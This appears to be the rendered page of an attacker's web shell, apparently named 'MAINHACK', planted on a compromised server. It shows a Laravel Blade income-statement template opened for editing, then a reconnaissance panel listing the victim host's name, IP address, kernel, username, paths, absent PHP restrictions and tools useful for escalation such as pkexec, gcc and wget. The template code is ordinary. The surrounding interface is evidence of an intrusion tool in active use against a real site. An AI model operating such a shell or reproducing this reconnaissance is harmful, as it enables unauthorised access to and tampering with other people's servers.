[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: b3dfd4369a5df576a6a3d3f330428a8a.php
<?php $__env->startSection('title', "Income Statement"); ?> <?php $__env->startSection('content'); ?> <?php if (isset($component)) { $__componentOriginala766c2d312d6f7864fe218e2500d2bba = $component; } ?> <?php if (isset($attributes)) { $__attributesOriginala766c2d312d6f7864fe218e2500d2bba = $attributes; } ?> <?php $component = Illuminate\View\AnonymousComponent::resolve(['view' => 'components.container','data' => ['title' => 'Income Statement']] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?> <?php $component->withName('container'); ?> <?php if ($component->shouldRender()): ?> <?php $__env->startComponent($component->resolveView(), $component->data()); ?> <?php if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?> <?php $attributes = $attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?> <?php endif; ?> <?php $component->withAttributes(['title' => 'Income Statement']); ?> <div class="text-end"> <a href="javascript:" id="window-printer" onclick="return(window.print())" class="btn btn-sm btn-success mb-2"> <i class="fa fa-print"></i> <?php echo e(translate('common.Print')); ?> </a> </div> <div class="table-responsive pt-0"> <table class="table"> <thead> <tr> <th><?php echo e(translate('common.Account Name')); ?></th> <th><?php echo e(translate('common.Balance')); ?></th> </tr> </thead> <tbody> <tr> <th><h4><?php echo e(translate('common.Revenue')); ?></h4></th> </tr> <?php $__currentLoopData = $incomeStatement['revenues']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $balance): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr> <td class="name"><?php echo e($balance->account_name); ?></td> <td><?php echo e(priceFormat($balance->balance)); ?></td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <tr> <td><h5><?php echo e(translate('common.Total')); ?></h5></td> <td><h5 class="text-decoration-underline"><?php echo e(priceFormat($incomeStatement['totalRevenue'])); ?></h5></td> </tr> <tr> <th><h4><?php echo e(translate('common.Expense')); ?></h4></th> </tr> <?php $__currentLoopData = $incomeStatement['expenses']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $balance): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr> <td class="name"><?php echo e($balance->account_name); ?></td> <td><?php echo e(priceFormat($balance->balance)); ?></td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <tr> <td><h5><?php echo e(translate('common.Total')); ?></h5></td> <td><h5 class="text-decoration-underline"><?php echo e(priceFormat($incomeStatement['totalExpense'])); ?></h5></td> </tr> <tr> <td class="name"><h4><?php echo e(translate('common.net Income')); ?></h4></td> <td><h4><?php echo e(priceFormat($incomeStatement['netIncome'])); ?></h4></td> </tr> </tbody> </table> <hr> </div> <?php echo $__env->renderComponent(); ?> <?php endif; ?> <?php if (isset($__attributesOriginala766c2d312d6f7864fe218e2500d2bba)): ?> <?php $attributes = $__attributesOriginala766c2d312d6f7864fe218e2500d2bba; ?> <?php unset($__attributesOriginala766c2d312d6f7864fe218e2500d2bba); ?> <?php endif; ?> <?php if (isset($__componentOriginala766c2d312d6f7864fe218e2500d2bba)): ?> <?php $component = $__componentOriginala766c2d312d6f7864fe218e2500d2bba; ?> <?php unset($__componentOriginala766c2d312d6f7864fe218e2500d2bba); ?> <?php endif; ?> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.backend', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/pham.eliosof.com/resources/views/accounts/reports/income-statement.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.58 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002